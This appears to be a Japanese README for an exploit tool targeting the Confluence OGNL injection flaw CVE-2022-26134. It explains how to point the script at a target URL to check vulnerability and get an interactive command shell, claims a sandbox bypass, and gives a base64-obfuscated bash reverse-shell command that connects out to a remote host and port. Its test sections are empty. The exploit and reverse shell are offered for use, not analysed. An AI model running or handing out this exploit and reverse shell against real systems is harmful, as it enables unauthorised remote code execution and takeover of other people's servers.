
[CVE-2022-26134]Confluence OGNL 式インジェクションによるサンドボックス回避を伴うRCE.
Confluence OGNL 式注入 RCE (CVE-2022-26134) の PoC および Exp
サンドボックスバイパスを追加、高バージョン対応。
Usage: python Confluence_cve_2022_26134_RCE.py http://example.com/
このスクリプトは自動でターゲットが脆弱かどうかをチェックし、脆弱であれば擬似インタラクティブシェルを起動します。
Linuxでのテスト:

Windowsでのテスト:

終了するには 'q' を入力してください。
コマンドパラメータは直接 runtime.exec メソッドに渡されるため、シェルのコンテキストを持ちません。
そのため、
Windowsでは、dir などの一部のコマンドを直接実行できません。その場合は cmd.exe /c dir を使用してください。
Linuxでは、特殊記号が有効にならない場合があります。リバースシェルのような特殊記号を含むコマンドを実行する必要がある場合は、base64 エンコードしてから bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xLjEuMS4xLzg4ODggMD4mmQ==}|{base64,-d}|{bash,-i} を使用してください。